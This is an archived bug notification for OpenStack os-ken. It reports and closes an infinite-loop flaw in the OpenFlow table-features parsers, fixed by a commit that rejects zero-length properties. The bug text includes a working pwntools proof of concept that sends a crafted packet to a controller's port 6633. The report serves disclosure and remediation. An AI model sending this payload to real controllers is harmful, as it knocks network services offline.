← Back to team overview

yahoo-eng-team team mailing list archive

  1. yahoo-eng-team team
  2. Mailing list archive
  3. Message #94153

[Bug 2067970] Re: infinite loop

  Thread PreviousDate PreviousThread Next 
Reviewed:  https://review.opendev.org/c/openstack/os-ken/+/922622
Committed: https://opendev.org/openstack/os-ken/commit/2f30f44406535991ec982608d04c8893b8fda9ad
Submitter: "Zuul (22348)"
Branch:    master

commit 2f30f44406535991ec982608d04c8893b8fda9ad
Author: elajkat <lajos.katona@xxxxxxxx>
Date:   Thu Jun 6 12:34:03 2024 +0200

    Raise ValueError in case unpack_from returns zero length
    
    Closes-Bug: #2067973
    Closes-Bug: #2067970
    Change-Id: If3327be6c0a4c25173473fb8879d111544d77af5


** Changed in: neutron
       Status: In Progress => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/2067970

Title:
  infinite loop

Status in neutron:
  Fix Released
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  in /os_ken/ofproto/ofproto_v1_3_parser.py about line=5269

  ```python
          while rest:
              p, rest = OFPTableFeatureProp.parse(rest)
              props.append(p)
          table_features.properties = props
  ```

  The rest variable here is obtained through the following code:

  ```python
          (type_, length) = struct.unpack_from(cls._PACK_STR, buf, 0)
          rest = buf[utils.round_up(length, 8):]
  ```
  If the length variable is tampered with to 0, rest will get the original buffer, causing the controller to fall into an infinite loop.

  poc:
  ```python
  from pwn import *
  p=remote("0.0.0.0",6633)
  payload="\x04\x13\x00\x58\x00\x00\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x0000\x48\x01\x00\x00\x00\x00\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00"
  p.send(payload)
  p.interactive()
  ```

  This problem also occurs with the following code:
  /os_ken/ofproto/ofproto_v1_3_parser.py about line=5269
  /os_ken/ofproto/ofproto_v1_4_parser.py about line=1789
  /os_ken/ofproto/ofproto_v1_5_parser.py about line=2029

  Can I ask if this can be used as a vulnerability and assigned a CVE
  number?

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/2067970/+subscriptions
  Thread PreviousDate PreviousThread Next